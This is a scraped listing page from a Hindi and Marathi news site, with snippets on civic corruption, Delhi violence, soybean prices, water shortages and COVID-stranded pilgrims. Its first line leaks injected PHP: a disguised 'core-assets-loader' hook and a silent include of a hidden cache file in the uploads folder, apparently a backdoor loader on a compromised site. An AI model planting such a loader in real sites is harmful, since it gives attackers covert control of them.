add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); समाचार – SOCH INDIA
Menu

महापालिकेच्या क्षेत्रीय कार्यालयाच्या वतीने होत असलेल्या नालेसफाईच्या कामाबाबत गैरव्यवहाराचे आरोप झाल्यानंतर तसेच अधिकाऱ्यांच्या संगनमताने नालेसफाईची कामे कागदावरच दाखवून ठेकेदार लाखो रुपये लाटत असल्याचे प्रकार पुढे आल्यानंतर आता नालेसफाईच्या कामांचे क्षेत्रीय कार्यालयांचे अधिकार काढून घेण्यात आले आहेत. यापुढे मुख्य खात्याकडूनच शहरातील नाल्यांची सफाई होणार आहे. महापालिकेच्या स्थायी समितीने तसा धोरणात्मक...

Read More

केंद्रीय मंत्री रविशंकर प्रसाद ने लिबरल और लेफ्ट दलों के लोगों पर जमकर निशाना साधा है. रविशंकर प्रसाद ने कहा है कि मैं अपने उदारवादी वामपंथी मित्रों से कहना चाहता हूं कि हमें हराकर, आप अपनी सरकार बना लें. आप हमें उदारवाद, धर्मनिरपेक्षता, समावेशिता और मानवाधिकार न सिखाएं. क्या...

Read More

सोयाबीनच्या उत्पादनात या वर्षी विक्रमी घट झाल्याने दरात वाढ होईल असा अंदाज असताना अचानकपणे गेल्या महिनाभरापासून सोयाबीनच्या दरात ५०० रुपयांची घसरण झाली आहे. त्यामुळे बाजारात अस्वस्थता निर्माण झाली असून गळीत धान्याच्या गळचेपीच्या धोरणाने महाराष्ट्रातील शेतकरी चांगलाच अडचणीत सापडला आहे. पाच वर्षांपूर्वी डाळींच्या उत्पादनात घट झाल्यानंतर केंद्र शासनाने देशभरातील डाळ...

Read More

अमृत योजनेअंतर्गत पनवेल महापालिका हद्दीतील नागरिकांना उन्हाळ्यातही पुरेसे पाणी देण्याच्या मुद्दय़ावर सरकारी पातळीवर गेले दोन वर्षे ‘मंथन’ सुरू आहे. पण त्यात ठेकेदाराला निधी वाढवून देण्यास सरकारने तयारी दाखवलेली नाही. त्यामुळे पाणीपुरवठय़ासाठी नवी वाहिनी टाकण्याचे काम सुरू होणार नाही. परिणामी यंदाही पालिका हद्दीतील नागरिकांना टंचाईचाच सामना करावा लागणार आहे. अमृत...

Read More

दिल्ली में अब स्थिति सामान्य होती दिख रही है. पिछले 2-3 दिनों में हिंसा की कोई नई घटना नहीं हुई है, लेकिन हिंसाग्रस्त नॉर्थ ईस्ट दिल्ली में शुक्रवार को जब एक बुजुर्ग कूड़ा बीनने के लिए वहां गए और वहां उसके सिर में काफी चोट लग गई. घायल अवस्था...

Read More

चीनमधील वुहान शहरातून लागण झालेल्या कोरोना व्हायरसचं संकट जगभर पसरले आहे. इराक व इराणमध्ये तीर्थयात्रेसाठी गेलेले महाराष्ट्रातील तब्बल सहाशे यात्रेकरू इराणची राजधानी तेहरानमध्ये अडकले आहेत. ‘करोना’च्या साथीमुळे इराक व इराणसह तेथील अन्य देशांनी सीमा बंद केल्यामुळे या भारतीय यात्रेकरूंना गेल्या आठ दिवसांपासून तेथेच अडकून पडावे लागले आहे. इराकची राजधानी...

Read More

उत्तरपूर्व दिल्लीतील शिव विहार परिसरात शुक्रवारी एका ६० वर्षीय व्यापाऱ्याचा मारहाणीदरम्यान मृत्यू झाला. त्यांच्या मृत्यूनंतर दिल्ली हिंसाचारातील मृतांचा आकडा ४२ वर पोहोचला आहे. यापूर्वी ठिकाणी मोठ्या प्रमाणात पोलिसांचा फौजफाटा तैनात करण्यात आला होता. मृत व्यक्तीचं आयुब अंसारी असं असून ते गाजियाबादमधील रहिवासी असल्याची माहिती पोलिसांकडून देण्यात आली. अद्याप या...

Read More

राज्यातील शासकीय कर्मचाऱ्यांना पाच दिवसांचा आठवडा लागू करण्याच्या राज्य सरकारच्या निर्णयाविरोधात उच्च न्यायालयात याचिका दाखल करण्यात आली आहे. याचिकेच्या माध्यमातून सरकारच्या निर्णयाला आव्हान देण्यात आलं आहे. महत्त्वाचं म्हणजे उद्या म्हणजेच २९ फेब्रुवारीपासून या निर्णयाची अंमलबजावणी होणार आहे. त्याच्या एक दिवस आधीच ही याचिका करण्यात आली आहे. सोलापूरमधील एका व्यावसायिक...

Read More

पृथ्वीला चंद्र किती आहेत असा प्रश्न विचारल्यास अगदी लहान पोरगाही एक असं उत्तर देईल. मात्र लवकरच या प्रश्नाचे उत्तर दोन असं द्यावं लागणार आहे. कारण पृथ्वीचा दुसरा चंद्र शोधल्याचा दावा अमेरिकेतील संशोधकांनी केला आहे. संशोधकांनी पृथ्वीच्या दुसऱ्या चंद्राला २०२० सीडी थ्री असं नाव दिलं आहे. मागील तीन वर्षांपासून हा...

Read More